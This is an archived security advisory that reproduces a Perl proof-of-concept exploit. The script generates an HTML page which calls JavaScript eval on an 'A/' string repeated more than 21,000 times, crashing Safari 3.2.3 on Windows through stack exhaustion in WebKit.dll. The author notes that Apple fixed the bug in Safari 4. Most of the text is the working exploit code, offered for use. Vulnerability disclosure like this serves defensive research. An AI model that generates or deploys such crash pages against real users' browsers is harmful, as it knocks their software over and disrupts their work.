Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit

2009-09-08T00:00:00
ID SECURITYVULNS:DOC:22421
Type securityvulns
Reporter Securityvulns
Modified 2009-09-08T00:00:00

Description

!/usr/bin/perl

letsgosurfinnowonsafari.pl

AKA

Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit

Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009

***************

Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating

21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"

exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times

(43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the

WebKit layout engine (www.webkit.org).

This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4

(4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for

quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty

much means that the stack for the process has been exhausted and its maximum size has been reached.

***************

letsgosurfinnowonsafari.pl

$fn = 'letsgosurfinnowwithsafari.html'; $size = 21526; # "Stack Overflow" WebKit.dll

$size = 21697; # "Access Violation" WebKit.dll

$payload = '<html><script type="text/javascript">' . "\n"; $payload = $payload . 'eval("' . "A/" x $size . '");' . "\n"; $payload = $payload . '</script></html>';

 open&#40;FD, &#39;&gt;&#39; . $fn&#41;;
 print FD $payload;
 close&#40;FD&#41;;